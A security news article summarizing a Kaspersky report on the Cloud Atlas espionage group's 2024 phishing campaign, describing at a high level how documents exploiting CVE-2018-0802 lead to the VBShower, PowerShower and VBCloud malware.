The cyber threat group known as Cloud Atlas, also referred to as Clean Ursa, Inception, Oxygen, and Red October, has been observed using a newly identified malware called VBCloud in its recent attack campaigns.

These campaigns, targeting "several dozen users" in 2024, primarily relied on phishing emails containing malicious documents. The documents exploited a vulnerability in the Microsoft Office Equation Editor (CVE-2018-0802) to execute the malware. While over 80% of the victims were located in Russia, additional cases were reported in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam, according to a report by Kaspersky researcher Oleg Kupreev.

VBCloud is part of a sophisticated multi-stage attack chain that begins with a booby-trapped Microsoft Office document. Once opened, the document downloads a malicious RTF file from a remote server, leveraging CVE-2018-0802 to execute an HTML Application (HTA) file. This leads to the deployment of VBShower, a backdoor capable of downloading additional payloads like PowerShower and VBCloud. VBShower also erases traces of its activity by cleaning temporary files. PowerShower functions similarly, but it utilizes PowerShell scripts for further exploitation, including Kerberoasting attacks to steal credentials. Seven distinct PowerShell payloads were documented, each designed for specific tasks, such as gathering system information, conducting dictionary attacks, or probing network resources.

VBCloud differentiates itself by relying on public cloud storage for command-and-control (C2) communications. Activated by a scheduled task whenever a user logs in, it collects system metadata and harvests sensitive documents and files, including those related to the Telegram messaging app. PowerShower, on the other hand, facilitates network reconnaissance and deeper infiltration. Together, these malware variants form a complex infection chain designed to steal data and expand access within targeted networks.

Kaspersky's analysis highlights the growing sophistication of Cloud Atlas, a group active since 2014. The campaign underscores the persistent use of older vulnerabilities like CVE-2018-0802 and CVE-2017-11882 to infiltrate systems. These exploits, combined with advanced malware like VBCloud, showcase the evolving tactics of cyber adversaries in targeting individuals and entities for espionage and data theft.